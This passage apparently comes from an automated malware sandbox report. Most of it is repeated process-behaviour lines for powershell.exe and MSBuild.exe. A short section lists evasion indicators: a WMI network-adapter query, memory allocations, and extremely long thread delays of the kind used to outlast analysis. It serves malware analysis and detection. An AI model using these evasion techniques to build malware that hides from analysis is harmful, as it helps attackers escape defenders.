                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1740000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1262Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2050Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4866Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4926Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 368Thread sleep count: 4866 > 30Jump to behavior
